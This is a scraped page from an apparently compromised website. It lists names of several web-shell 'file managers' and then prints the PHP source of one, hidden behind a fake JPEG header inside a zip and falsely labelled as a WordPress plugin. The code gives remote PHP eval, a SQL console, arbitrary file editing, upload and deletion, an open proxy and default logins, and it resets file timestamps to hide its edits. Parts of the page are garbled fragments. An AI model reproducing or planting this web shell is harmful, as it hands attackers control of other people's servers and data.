芝麻web文件管理V1.00

File Manager -

芝麻web文件管理V1.00

File Manager -

📁 File Manager

Edit: ".htmlspecialchars($file)."

Confirm Delete

ðŸ“ Dr_SQL File Manager

Edit: ".htmlspecialchars($file)."

Confirm Delete

ðŸ“ Dr_SQL File Manager

ZSec File Manager

✏️ Edit: ".htmlspecialchars($file)."

X7ROOT File Manager

✏️ Editing: " . htmlspecialchars($_GET['edit']) . "

🗂️ FoxDrop Manager

ðŸ“ Dr_SQL File Manager

swallowable

âœï¸ Editing: ' . htmlspecialchars($file) . '

â„¹ï¸ System Info

ðŸ’» Command Executor

Edit File

This folder is empty

Editing: ".safe($file)."

Upload File

Create Folder

swallowable

âœï¸ Editing: ' . htmlspecialchars($file) . '

â„¹ï¸ System Info

编辑当前文件:/home/greakqsw/theblogginglab.org/7648l2-20260310230235/z6fv0s.zip

PK������Jm\��Ǵq7�q7�	��oiq2p.phpnu��[�����������ÿØÿà JFIF      ÿÛ C

!"$"$ÿÛ C  ÿÀ  ° ÿÄ

ÿÄ µ   } !1AQa "q2‘¡#B±ÁRÑð$3br‚	
%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyzƒ„…†‡ˆ‰Š’“”•–—˜™š¢£¤¥¦§¨©ª²³´µ¶·¸¹ºÂÃÄÅÆÇÈÉÊÒÓÔÕÖ×ØÙÚáâãäåæçèéêñòóôõö÷øùúÿÄ

ÿÄ µ   w !1AQ aq"2B‘¡±Á	#3RðbrÑ
$4á%ñ&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz‚ƒ„…†‡ˆ‰Š’“”•–—˜™š¢£¤¥¦§¨©ª²³´µ¶·¸¹ºÂÃÄÅÆÇÈÉÊÒÓÔÕÖ×ØÙÚâãäåæçèéêòóôõö÷øùúÿÚ   ? ÈN
<?php
/**
  Plugin Name: File Manager Advanced
  Plugin URI: https://wordpress.org/plugins/file-manager-advanced
  Description: Cpanel for files management in wordpress
  Author: modalweb
  Version: 5.2.12
  Author URI: https://advancedfilemanager.com
  License: GPLv2
**/
/**
 * Loading constants
 */

// Configuration — do not change manually!

// Preparations
$starttime = explode(' ', microtime());
$starttime = $starttime[1] + $starttime[0];
$langs = array('en','ru','de','fr','uk');
$path = empty($_REQUEST['path']) ? $path = realpath('.') : realpath($_REQUEST['path']);
$path = str_replace('\\', '/', $path) . '/';
$main_path=str_replace('\\', '/',realpath('./'));
$phar_maybe = (version_compare(phpversion(),"5.3.0","<"))?true:false;
$msg = ''; // service string
$default_language = 'ru';
$detect_lang = true;
$fm_version = 1.4;

//Authorization
$auth = json_decode($authorization,true);
$auth['authorize'] = isset($auth['authorize']) ? $auth['authorize'] : 0; 
$auth['days_authorization'] = (isset($auth['days_authorization'])&&is_numeric($auth['days_authorization'])) ? (int)$auth['days_authorization'] : 30;
$auth['login'] = isset($auth['login']) ? $auth['login'] : 'admin';  
$auth['password'] = isset($auth['password']) ? $auth['password'] : 'phpfm';  
$auth['cookie_name'] = isset($auth['cookie_name']) ? $auth['cookie_name'] : 'fm_user';
$auth['script'] = isset($auth['script']) ? $auth['script'] : '';

// Little default config
$fm_default_config = array (
	'make_directory' => true, 
	'new_file' => true, 
	'upload_file' => true, 
	'show_dir_size' => false, //if true, show directory size → maybe slow 
	'show_img' => true, 
	'show_php_ver' => true, 
	'show_php_ini' => false, // show path to current php.ini
	'show_gt' => true, // show generation time
	'enable_php_console' => true,
	'enable_sql_console' => true,
	'sql_server' => 'localhost',
	'sql_username' => 'root',
	'sql_password' => '',
	'sql_db' => 'test_base',
	'enable_proxy' => true,
	'show_phpinfo' => true,
	'show_xls' => true,
	'fm_settings' => true,
	'restore_time' => true,
	'fm_restore_time' => false,
);

if (empty($_COOKIE['fm_config'])) $fm_config = $fm_default_config;
else $fm_config = unserialize($_COOKIE['fm_config']);

// Change language
if (isset($_POST['fm_lang'])) { 
	setcookie('fm_lang', $_POST['fm_lang'], time() + (86400 * $auth['days_authorization']));
	$_COOKIE['fm_lang'] = $_POST['fm_lang'];
}
$language = $default_language;

// Detect browser language
if($detect_lang && !empty($_SERVER['HTTP_ACCEPT_LANGUAGE']) && empty($_COOKIE['fm_lang'])){
	$lang_priority = explode(',', $_SERVER['HTTP_ACCEPT_LANGUAGE']);
	if (!empty($lang_priority)){
		foreach ($lang_priority as $lang_arr){
			$lng = explode(';', $lang_arr);
			$lng = $lng[0];
			if(in_array($lng,$langs)){
				$language = $lng;
				break;
			}
		}
	}
}

// Cookie language is primary for ever
$language = (empty($_COOKIE['fm_lang'])) ? $language : $_COOKIE['fm_lang'];

// Localization
$lang = json_decode($translation,true);
if ($lang['id']!=$language) {
	$get_lang = file_get_contents('https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/' . $language . '.json');
	if (!empty($get_lang)) {
		//remove unnecessary characters
		$translation_string = str_replace("'",''',json_encode(json_decode($get_lang),JSON_UNESCAPED_UNICODE));
		$fgc = file_get_contents(__FILE__);
		$search = preg_match('#translation[\s]?\=[\s]?\'\{\"(.*?)\"\}\';#', $fgc, $matches);
		if (!empty($matches[1])) {
			$filemtime = filemtime(__FILE__);
			$replace = str_replace('{"'.$matches[1].'"}',$translation_string,$fgc);
			if (file_put_contents(__FILE__, $replace)) {
				$msg .= __('File updated');
			}	else $msg .= __('Error occurred');
			if (!empty($fm_config['fm_restore_time'])) touch(__FILE__,$filemtime);
		}	
		$lang = json_decode($translation_string,true);
	}
}

/* Functions */

//translation
function __($text){
	global $lang;
	if (isset($lang[$text])) return $lang[$text];
	else return $text;
};

//delete files and dirs recursively
function fm_del_files($file, $recursive = false) {
	if($recursive && @is_dir($file)) {
		$els = fm_scan_dir($file, '', '', true);
		foreach ($els as $el) {
			if($el != '.' && $el != '..'){
				fm_del_files($file . '/' . $el, true);
			}
		}
	}
	if(@is_dir($file)) {
		return rmdir($file);
	} else {
		return @unlink($file);
	}
}

//file perms
function fm_rights_string($file, $if = false){
	$perms = fileperms($file);
	$info = '';
	if(!$if){
		if (($perms & 0xC000) == 0xC000) {
			//Socket
			$info = 's';
		} elseif (($perms & 0xA000) == 0xA000) {
			//Symbolic Link
			$info = 'l';
		} elseif (($perms & 0x8000) == 0x8000) {
			//Regular
			$info = '-';
		} elseif (($perms & 0x6000) == 0x6000) {
			//Block special
			$info = 'b';
		} elseif (($perms & 0x4000) == 0x4000) {
			//Directory
			$info = 'd';
		} elseif (($perms & 0x2000) == 0x2000) {
			//Character special
			$info = 'c';
		} elseif (($perms & 0x1000) == 0x1000) {
			//FIFO pipe
			$info = 'p';
		} else {
			//Unknown
			$info = 'u';
		}
	}
  
	//Owner
	$info .= (($perms & 0x0100) ? 'r' : '-');
	$info .= (($perms & 0x0080) ? 'w' : '-');
	$info .= (($perms & 0x0040) ?
	(($perms & 0x0800) ? 's' : 'x' ) :
	(($perms & 0x0800) ? 'S' : '-'));
 
	//Group
	$info .= (($perms & 0x0020) ? 'r' : '-');
	$info .= (($perms & 0x0010) ? 'w' : '-');
	$info .= (($perms & 0x0008) ?
	(($perms & 0x0400) ? 's' : 'x' ) :
	(($perms & 0x0400) ? 'S' : '-'));
 
	//World
	$info .= (($perms & 0x0004) ? 'r' : '-');
	$info .= (($perms & 0x0002) ? 'w' : '-');
	$info .= (($perms & 0x0001) ?
	(($perms & 0x0200) ? 't' : 'x' ) :
	(($perms & 0x0200) ? 'T' : '-'));

return $info;
}

function fm_convert_rights($mode) {
	$mode = str_pad($mode,9,'-');
	$trans = array('-'=>'0','r'=>'4','w'=>'2','x'=>'1');
	$mode = strtr($mode,$trans);
	$newmode = '0';
	$owner = (int) $mode[0] + (int) $mode[1] + (int) $mode[2]; 
	$group = (int) $mode[3] + (int) $mode[4] + (int) $mode[5]; 
	$world = (int) $mode[6] + (int) $mode[7] + (int) $mode[8]; 
	$newmode .= $owner . $group . $world;
	return intval($newmode, 8);
}

//load files
function fm_download($file_name) {
    if (!empty($file_name)) {
		if (file_exists($file_name)) {
			header("Content-Disposition: attachment; filename=" . basename($file_name));   
			header("Content-Type: application/force-download");
			header("Content-Type: application/octet-stream");
			header("Content-Type: application/download");
			header("Content-Description: File Transfer");            
			header("Content-Length: " . filesize($file_name));		
			flush(); // this doesn't really matter.
			$fp = fopen($file_name, "r");
			while (!feof($fp)) {
				echo fread($fp, 65536);
				flush(); // this is essential for large downloads
			} 
			fclose($fp);
			die();
		} else {
			header('HTTP/1.0 404 Not Found', true, 404);
			header('Status: 404 Not Found'); 
			die();
        }
    } 
}

//show folder size
function fm_dir_size($f,$format=true) {
	if($format)  {
		$size=fm_dir_size($f,false);
		if($size<=1024) return $size.' bytes';
		elseif($size<=1024*1024) return round($size/(1024),2).' Kb';
		elseif($size<=1024*1024*1024) return round($size/(1024*1024),2).' Mb';
		elseif($size<=1024*1024*1024*1024) return round($size/(1024*1024*1024),2).' Gb';
		elseif($size<=1024*1024*1024*1024*1024) return round($size/(1024*1024*1024*1024),2).' Tb'; //:)))
		else return round($size/(1024*1024*1024*1024*1024),2).' Pb'; // ;-)
	} else {
		if(is_file($f)) return filesize($f);
		$size=0;
		$dh=opendir($f);
		while(($file=readdir($dh))!==false) {
			if($file=='.' || $file=='..') continue;
			if(is_file($f.'/'.$file)) $size+=filesize($f.'/'.$file);
			else $size+=fm_dir_size($f.'/'.$file,false);
		}
		closedir($dh);
		return $size+filesize($f); 
	}
}

//scan directory
function fm_scan_dir($directory, $exp = '', $type = 'all', $do_not_filter = false) {
	$dir = $ndir = array();
	if(!empty($exp)){
		$exp = '/^' . str_replace('*', '(.*)', str_replace('.', '\\.', $exp)) . '$/';
	}
	if(!empty($type) && $type !== 'all'){
		$func = 'is_' . $type;
	}
	if(@is_dir($directory)){
		$fh = opendir($directory);
		while (false !== ($filename = readdir($fh))) {
			if(substr($filename, 0, 1) != '.' || $do_not_filter) {
				if((empty($type) || $type == 'all' || $func($directory . '/' . $filename)) && (empty($exp) || preg_match($exp, $filename))){
					$dir[] = $filename;
				}
			}
		}
		closedir($fh);
		natsort($dir);
	}
	return $dir;
}

function fm_link($get,$link,$name,$title='') {
	if (empty($title)) $title=$name.' '.basename($link);
	return '  <a href="?'.$get.'='.base64_encode($link).'" title="'.$title.'">'.$name.'</a>';
}

function fm_arr_to_option($arr,$n,$sel=''){
	foreach($arr as $v){
		$b=$v[$n];
		$res.='<option value="'.$b.'" '.($sel && $sel==$b?'selected':'').'>'.$b.'</option>';
	}
	return $res;
}

function fm_lang_form ($current='en'){
return '
<form name="change_lang" method="post" action="">
	<select name="fm_lang" title="'.__('Language').'" onchange="document.forms[\'change_lang\'].submit()" >
		<option value="en" '.($current=='en'?'selected="selected" ':'').'>'.__('English').'</option>
		<option value="de" '.($current=='de'?'selected="selected" ':'').'>'.__('German').'</option>
		<option value="ru" '.($current=='ru'?'selected="selected" ':'').'>'.__('Russian').'</option>
		<option value="fr" '.($current=='fr'?'selected="selected" ':'').'>'.__('French').'</option>
		<option value="uk" '.($current=='uk'?'selected="selected" ':'').'>'.__('Ukrainian').'</option>
	</select>
</form>
';
}
	
function fm_root($dirname){
	return ($dirname=='.' OR $dirname=='..');
}

function fm_php($string){
	$display_errors=ini_get('display_errors');
	ini_set('display_errors', '1');
	ob_start();
	eval(trim($string));
	$text = ob_get_contents();
	ob_end_clean();
	ini_set('display_errors', $display_errors);
	return $text;
}

//SHOW DATABASES
function fm_sql_connect(){
	global $fm_config;
	return new mysqli($fm_config['sql_server'], $fm_config['sql_username'], $fm_config['sql_password'], $fm_config['sql_db']);
}

//save file
    $file=gmdate("Y-m-d_H-i-s",time()).'.sql';
	$handle = fopen($file,'w+');
	fwrite($handle,$return);
	fclose($handle);
	$alert = 'onClick="if(confirm(\''. __('File selected').': \n'. $file. '. \n'.__('Are you sure you want to delete this file?') . '\')) document.location.href = \'?delete=' . $file . '&path=' . $path  . '\'"';
    return $file.': '.fm_link('download',$path.$file,__('Download'),__('Download').' '.$file).' <a href="#" title="' . __('Delete') . ' '. $file . '" ' . $alert . '>' . __('Delete') . '</a>';
}

function fm_img_link($filename){
	return './'.basename(__FILE__).'?img='.base64_encode($filename);
}

function fm_home_style(){
	return '
input, input.fm_input {
	text-indent: 2px;
}

input, textarea, select, input.fm_input {
	color: black;
	font: normal 8pt Verdana, Arial, Helvetica, sans-serif;
	border-color: black;
	background-color: #FCFCFC none !important;
	border-radius: 0;
	padding: 2px;
}

input.fm_input {
	background: #FCFCFC none !important;
	cursor: pointer;
}

.home {
	background-image: url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAMAAAAoLQ9TAAAABGdBTUEAAK/INwWK6QAAAgRQTFRF/f396Ojo////tT02zr+fw66Rtj432TEp3MXE2DAr3TYp1y4mtDw2/7BM/7BOqVpc/8l31jcqq6enwcHB2Tgi5jgqVpbFvra2nBAV/Pz82S0jnx0W3TUkqSgi4eHh4Tsre4wosz026uPjzGYd6Us3ynAydUBA5Kl3fm5eqZaW7ODgi2Vg+Pj4uY+EwLm5bY9U//7jfLtC+tOK3jcm/71u2jYo1UYh5aJl/seC3jEm12kmJrIA1jMm/9aU4Lh0e01BlIaE///dhMdC7IA//fTZ2c3MW6nN30wf95Vd4JdXoXVos8nE4efN/+63IJgSnYhl7F4csXt89GQUwL+/jl1c41Aq+fb2gmtI1rKa2C4kJaIA3jYrlTw5tj423jYn3cXE1zQoxMHBp1lZ3Dgmqiks/+mcjLK83jYkymMV3TYk//HM+u7Whmtr0odTpaOjfWJfrHpg/8Bs/7tW/7Ve+4U52DMm3MLBn4qLgNVM6MzB3lEflIuL/+jA///20LOzjXx8/7lbWpJG2C8k3TosJKMA1ywjopOR1zYp5Dspiay+yKNhqKSk8NW6/fjns7Oz2tnZuz887b+W3aRY/+ms4rCE3Tot7V85bKxjuEA3w45Vh5uhq6am4cFxgZZW/9qIuwgKy0sW+ujT4TQntz423C8i3zUj/+Kw/a5d6UMxuL6wzDEr////cqJQfAAAAKx0Uk5T////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////AAWVFbEAAAAZdEVYdFNvZnR3YXJlAEFkb2JlIEltYWdlUmVhZHlxyWU8AAAA2UlEQVQoU2NYjQYYsAiE8U9YzDYjVpGZRxMiECitMrVZvoMrTlQ2ESRQJ2FVwinYbmqTULoohnE1g1aKGS/fNMtk40yZ9KVLQhgYkuY7NxQvXyHVFNnKzR69qpxBPMez0ETAQyTUvSogaIFaPcNqV/M5dha2Rl2Timb6Z+QBDY1XN/Sbu8xFLG3eLDfl2UABjilO1o012Z3ek1lZVIWAAmUTK6L0s3pX+jj6puZ2AwWUvBRaphswMdUujCiwDwa5VEdPI7ynUlc7v1qYURLquf42hz45CBPDtwACrm+RDcxJYAAAAABJRU5ErkJggg==");
	background-repeat: no-repeat;
}';
}

function fm_config_checkbox_row($name,$value) {
	global $fm_config;
	return '<tr><td class="row1"><input id="fm_config_'.$value.'" name="fm_config['.$value.']" value="1" '.(empty($fm_config[$value])?'':'checked="true"').' type="checkbox"></td><td class="row2 whole"><label for="fm_config_'.$value.'">'.$name.'</td></tr>';
}

function fm_protocol() {
	if (isset($_SERVER['HTTP_SCHEME'])) return $_SERVER['HTTP_SCHEME'].'://';
	if (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') return 'https://';
	if (isset($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == 443) return 'https://';
	if (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https') return 'https://';
	return 'http://';
}

function fm_site_url() {
	return fm_protocol().$_SERVER['HTTP_HOST'];
}

function fm_url($full=false) {
	$host=$full?fm_site_url():'.';
	return $host.'/'.basename(__FILE__);
}

function fm_home($full=false){
	return ' <a href="'.fm_url($full).'" title="'.__('Home').'"><span class="home">    </span></a>';
}

function fm_run_input($lng) {
	global $fm_config;
	$return = !empty($fm_config['enable_'.$lng.'_console']) ? 
	'
				<form  method="post" action="'.fm_url().'" style="display:inline">
				<input type="submit" name="'.$lng.'run" value="'.strtoupper($lng).' '.__('Console').'">
				</form>
' : '';
	return $return;
}

'; } return ' '.$str.'

'.strtoupper($lng_tpl).' '.__('templates').' '.fm_run_input($lng_tpl).'
'.__('Name').'	'.__('Value').'

'; } function find_text_in_files($dir, $mask, $text) { $results = array(); if ($handle = opendir($dir)) { while (false !== ($entry = readdir($handle))) { if ($entry != "." && $entry != "..") { $path = $dir . "/" . $entry; if (is_dir($path)) { $results = array_merge($results, find_text_in_files($path, $mask, $text)); } else { if (fnmatch($mask, $entry)) { $contents = file_get_contents($path); if (strpos($contents, $text) !== false) { $results[] = str_replace('//', '/', $path); } } } } } closedir($handle); } return $results; } /* End Functions */ // authorization if ($auth['authorize']) { if (isset($_POST['login']) && isset($_POST['password'])){ if (($_POST['login']==$auth['login']) && ($_POST['password']==$auth['password'])) { setcookie($auth['cookie_name'], $auth['login'].'|'.md5($auth['password']), time() + (86400 * $auth['days_authorization'])); $_COOKIE[$auth['cookie_name']]=$auth['login'].'|'.md5($auth['password']); } } if (!isset($_COOKIE[$auth['cookie_name']]) OR ($_COOKIE[$auth['cookie_name']]!=$auth['login'].'|'.md5($auth['password']))) { echo ' '.__('File manager').' '.fm_lang_form($language).' '; die(); } if (isset($_POST['quit'])) { unset($_COOKIE[$auth['cookie_name']]); setcookie($auth['cookie_name'], '', time() - (86400 * $auth['days_authorization'])); header('Location: '.fm_site_url().$_SERVER['REQUEST_URI']); } } // Change config if (isset($_GET['fm_settings'])) { if (isset($_GET['fm_config_delete'])) { unset($_COOKIE['fm_config']); setcookie('fm_config', '', time() - (86400 * $auth['days_authorization'])); header('Location: '.fm_url().'?fm_settings=true'); exit(0); } elseif (isset($_POST['fm_config'])) { $fm_config = $_POST['fm_config']; setcookie('fm_config', serialize($fm_config), time() + (86400 * $auth['days_authorization'])); $_COOKIE['fm_config'] = serialize($fm_config); $msg = __('Settings').' '.__('done'); } elseif (isset($_POST['fm_login'])) { if (empty($_POST['fm_login']['authorize'])) $_POST['fm_login'] = array('authorize' => '0') + $_POST['fm_login']; $fm_login = json_encode($_POST['fm_login']); $fgc = file_get_contents(__FILE__); $search = preg_match('#authorization[\s]?\=[\s]?\'\{\"(.*?)\"\}\';#', $fgc, $matches); if (!empty($matches[1])) { $filemtime = filemtime(__FILE__); $replace = str_replace('{"'.$matches[1].'"}',$fm_login,$fgc); if (file_put_contents(__FILE__, $replace)) { $msg .= __('File updated'); if ($_POST['fm_login']['login'] != $auth['login']) $msg .= ' '.__('Login').': '.$_POST['fm_login']['login']; if ($_POST['fm_login']['password'] != $auth['password']) $msg .= ' '.__('Password').': '.$_POST['fm_login']['password']; $auth = $_POST['fm_login']; } else $msg .= __('Error occurred'); if (!empty($fm_config['fm_restore_time'])) touch(__FILE__,$filemtime); } } elseif (isset($_POST['tpl_edited'])) { $lng_tpl = $_POST['tpl_edited']; if (!empty($_POST[$lng_tpl.'_name'])) { $fm_php = json_encode(array_combine($_POST[$lng_tpl.'_name'],$_POST[$lng_tpl.'_value']),JSON_HEX_APOS); } elseif (!empty($_POST[$lng_tpl.'_new_name'])) { $fm_php = json_encode(json_decode(${$lng_tpl.'_templates'},true)+array($_POST[$lng_tpl.'_new_name']=>$_POST[$lng_tpl.'_new_value']),JSON_HEX_APOS); } if (!empty($fm_php)) { $fgc = file_get_contents(__FILE__); $search = preg_match('#'.$lng_tpl.'_templates[\s]?\=[\s]?\'\{\"(.*?)\"\}\';#', $fgc, $matches); if (!empty($matches[1])) { $filemtime = filemtime(__FILE__); $replace = str_replace('{"'.$matches[1].'"}',$fm_php,$fgc); if (file_put_contents(__FILE__, $replace)) { ${$lng_tpl.'_templates'} = $fm_php; $msg .= __('File updated'); } else $msg .= __('Error occurred'); if (!empty($fm_config['fm_restore_time'])) touch(__FILE__,$filemtime); } } else $msg .= __('Error occurred'); } } // Just show image if (isset($_GET['img'])) { $file=base64_decode($_GET['img']); if ($info=getimagesize($file)){ switch ($info[2]){ //1=GIF, 2=JPG, 3=PNG, 4=SWF, 5=PSD, 6=BMP case 1: $ext='gif'; break; case 2: $ext='jpeg'; break; case 3: $ext='png'; break; case 6: $ext='bmp'; break; default: die(); } header("Content-type: image/$ext"); echo file_get_contents($file); die(); } } // Just download file if (isset($_GET['download'])) { $file=base64_decode($_GET['download']); fm_download($file); } // Just show info if (isset($_GET['phpinfo'])) { phpinfo(); die(); } // Mini proxy, many bugs! if (isset($_GET['proxy']) && (!empty($fm_config['enable_proxy']))) { $url = isset($_GET['url'])?urldecode($_GET['url']):''; $proxy_form = '

'; if ($url) { $ch = curl_init($url); curl_setopt($ch, CURLOPT_USERAGENT, 'Den1xxx test proxy'); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST,0); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER,0); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_REFERER, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER,true); $result = curl_exec($ch); curl_close($ch); //$result = preg_replace('#(src)=["\'][http://]?([^:]*)["\']#Ui', '\\1="'.$url.'/\\2"', $result); $result = preg_replace_callback('#(href|src)=["\'][http://]?([^:]*)["\']#Ui', 'fm_url_proxy', $result); $result = preg_replace('%()%i', '$1'.''.$proxy_form, $result); echo $result; die(); } } ?> <?=__('File manager')?>

'.__('File manager').' - '.__('Settings').' '.(empty($msg)?'':''.$msg.'').' '.fm_config_checkbox_row(__('Show size of the folder'),'show_dir_size').' '.fm_config_checkbox_row(__('Show').' '.__('pictures'),'show_img').' '.fm_config_checkbox_row(__('Show').' '.__('Make directory'),'make_directory').' '.fm_config_checkbox_row(__('Show').' '.__('New file'),'new_file').' '.fm_config_checkbox_row(__('Show').' '.__('Upload'),'upload_file').' '.fm_config_checkbox_row(__('Show').' PHP version','show_php_ver').' '.fm_config_checkbox_row(__('Show').' PHP ini','show_php_ini').' '.fm_config_checkbox_row(__('Show').' '.__('Generation time'),'show_gt').' '.fm_config_checkbox_row(__('Show').' xls','show_xls').' '.fm_config_checkbox_row(__('Show').' PHP '.__('Console'),'enable_php_console').' '.fm_config_checkbox_row(__('Show').' SQL '.__('Console'),'enable_sql_console').' SQL server SQL user SQL password SQL DB '.fm_config_checkbox_row(__('Show').' Proxy','enable_proxy').' '.fm_config_checkbox_row(__('Show').' phpinfo()','show_phpinfo').' '.fm_config_checkbox_row(__('Show').' '.__('Settings'),'fm_settings').' '.fm_config_checkbox_row(__('Restore file time after editing'),'restore_time').' '.fm_config_checkbox_row(__('File manager').': '.__('Restore file time after editing'),'fm_restore_time').' '.__('Reset settings').'

'.__('Settings').' - '.__('Authorization').'
	'.__('Authorization').'
	'.__('Login').'
	'.__('Password').'
	'.__('Cookie').'
	'.__('Days').'
'.$auth['script'].'	'.__('Script').'

'; echo fm_tpl_form('php'),fm_tpl_form('sql'); } elseif (isset($proxy_form)) { die($proxy_form); } elseif (isset($res_lng)) { ?>

'.fm_run_input('php'); else echo '

'.fm_run_input('sql'); ?>

'.strtoupper($res_lng).' '.__('Result').'

'.$fun($res).'

'; } } elseif (!empty($_REQUEST['edit'])){ if(!empty($_REQUEST['save'])) { $fn = $path . $_REQUEST['edit']; $filemtime = filemtime($fn); if (file_put_contents($fn, $_REQUEST['newcontent'])) $msg .= __('File updated'); else $msg .= __('Error occurred'); if ($_GET['edit']==basename(__FILE__)) { touch(__FILE__,1415116371); } else { if (!empty($fm_config['restore_time'])) touch($fn,$filemtime); } } $oldcontent = @file_get_contents($path . $_REQUEST['edit']); $editlink = $url_inc . '&edit=' . $_REQUEST['edit'] . '&path=' . $path; $backlink = $url_inc . '&path=' . $path; ?>




<?=htmlspecialchars($oldcontent)?>

'.') { if(!empty($_REQUEST['save'])) { rename($path . $_REQUEST['rename'], $path . $_REQUEST['newname']); $msg .= (__('File updated')); $_REQUEST['rename'] = $_REQUEST['newname']; } clearstatcache(); $link = $url_inc . '&rename=' . $_REQUEST['rename'] . '&path=' . $path; $backlink = $url_inc . '&path=' . $path; ?>




:

'.') { if(!fm_del_files(($path . $_REQUEST['delete']), true)) { $msg .= __('Error occurred'); } else { $msg .= __('Deleted').' '.$_REQUEST['delete']; } } elseif(!empty($_REQUEST['mkdir'])&&!empty($fm_config['make_directory'])) { if(!@mkdir($path . $_REQUEST['dirname'],0777)) { $msg .= __('Error occurred'); } else { $msg .= __('Created').' '.$_REQUEST['dirname']; } } elseif(!empty($_POST['search_recursive'])) { ini_set('max_execution_time', '0'); $search_data = find_text_in_files($_POST['path'], $_POST['mask'], $_POST['search_recursive']); if(!empty($search_data)) { $msg .= __('Found in files').' ('.count($search_data).'):
'; foreach ($search_data as $filename) { $msg .= ''.basename($filename).' '; } } else { $msg .= __('Nothing founded'); } } elseif(!empty($_REQUEST['mkfile'])&&!empty($fm_config['new_file'])) { if(!$fp=@fopen($path . $_REQUEST['filename'],"w")) { $msg .= __('Error occurred'); } else { fclose($fp); $msg .= __('Created').' '.$_REQUEST['filename']; } } elseif (isset($_GET['zip'])) { $source = base64_decode($_GET['zip']); $destination = basename($source).'.zip'; set_time_limit(0); $phar = new PharData($destination); $phar->buildFromDirectory($source); if (is_file($destination)) $msg .= __('Task').' "'.__('Archiving').' '.$destination.'" '.__('done'). '. '.fm_link('download',$path.$destination,__('Download'),__('Download').' '. $destination) .' '.__('Delete') . ''; else $msg .= __('Error occurred').': '.__('no files'); } elseif (isset($_GET['gz'])) { $source = base64_decode($_GET['gz']); $archive = $source.'.tar'; $destination = basename($source).'.tar'; if (is_file($archive)) unlink($archive); if (is_file($archive.'.gz')) unlink($archive.'.gz'); clearstatcache(); set_time_limit(0); //die(); $phar = new PharData($destination); $phar->buildFromDirectory($source); $phar->compress(Phar::GZ,'.tar.gz'); unset($phar); if (is_file($archive)) { if (is_file($archive.'.gz')) { unlink($archive); $destination .= '.gz'; } $msg .= __('Task').' "'.__('Archiving').' '.$destination.'" '.__('done'). '. '.fm_link('download',$path.$destination,__('Download'),__('Download').' '. $destination) .' '.__('Delete').''; } else $msg .= __('Error occurred').': '.__('no files'); } elseif (isset($_GET['decompress'])) { // $source = base64_decode($_GET['decompress']); // $destination = basename($source); // $ext = end(explode(".", $destination)); // if ($ext=='zip' OR $ext=='gz') { // $phar = new PharData($source); // $phar->decompress(); // $base_file = str_replace('.'.$ext,'',$destination); // $ext = end(explode(".", $base_file)); // if ($ext=='tar'){ // $phar = new PharData($base_file); // $phar->extractTo(dir($source)); // } // } // $msg .= __('Task').' "'.__('Decompress').' '.$source.'" '.__('done'); } elseif (isset($_GET['gzfile'])) { $source = base64_decode($_GET['gzfile']); $archive = $source.'.tar'; $destination = basename($source).'.tar'; if (is_file($archive)) unlink($archive); if (is_file($archive.'.gz')) unlink($archive.'.gz'); set_time_limit(0); //echo $destination; $ext_arr = explode('.',basename($source)); if (isset($ext_arr[1])) { unset($ext_arr[0]); $ext=implode('.',$ext_arr); } $phar = new PharData($destination); $phar->addFile($source); $phar->compress(Phar::GZ,$ext.'.tar.gz'); unset($phar); if (is_file($archive)) { if (is_file($archive.'.gz')) { unlink($archive); $destination .= '.gz'; } $msg .= __('Task').' "'.__('Archiving').' '.$destination.'" '.__('done'). '. '.fm_link('download',$path.$destination,__('Download'),__('Download').' '. $destination) .' '.__('Delete').''; } else $msg .= __('Error occurred').': '.__('no files'); } ?>

'.$file.''; $loadlink= (fm_root($file)||$phar_maybe) ? '' : fm_link('zip',$filename,__('Compress').' zip',__('Archiving').' '. $file); $arlink = (fm_root($file)||$phar_maybe) ? '' : fm_link('gz',$filename,__('Compress').' .tar.gz',__('Archiving').' '.$file); $style = 'row2'; if (!fm_root($file)) $alert = 'onClick="if(confirm(\'' . __('Are you sure you want to delete this directory (recursively)?').'\n /'. $file. '\')) document.location.href = \'' . $url_inc . '&delete=' . $file . '&path=' . $path . '\'"'; else $alert = ''; } else { $link = $fm_config['show_img']&&@getimagesize($filename) ? ' '.$file.'' : ' '.$file.''; $e_arr = explode(".", $file); $ext = end($e_arr); $loadlink = fm_link('download',$filename,__('Download'),__('Download').' '. $file); $arlink = in_array($ext,array('zip','gz','tar')) ? '' : ((fm_root($file)||$phar_maybe) ? '' : fm_link('gzfile',$filename,__('Compress').' .tar.gz',__('Archiving').' '. $file)); $style = 'row1'; $alert = 'onClick="if(confirm(\''. __('File selected').': \n'. $file. '. \n'.__('Are you sure you want to delete this file?') . '\')) document.location.href = \'' . $url_inc . '&delete=' . $file . '&path=' . $path . '\'"'; } $deletelink = fm_root($file) ? '' : '' . __('Delete') . ''; $renamelink = fm_root($file) ? '' : '' . __('Rename') . ''; $rightstext = ($file=='.' || $file=='..') ? '' : '' . @fm_rights_string($filename) . ''; ?>

Github | .'; if (!empty($fm_config['show_php_ver'])) echo ' | PHP '.phpversion(); if (!empty($fm_config['show_php_ini'])) echo ' | '.php_ini_loaded_file(); if (!empty($fm_config['show_gt'])) echo ' | '.__('Generation time').': '.round($totaltime,2); if (!empty($fm_config['enable_proxy'])) echo ' | proxy'; if (!empty($fm_config['show_phpinfo'])) echo ' | phpinfo'; if (!empty($fm_config['show_xls'])&&!empty($link)) echo ' | xls'; if (!empty($fm_config['fm_settings'])) echo ' | '.__('Settings').''; ?>

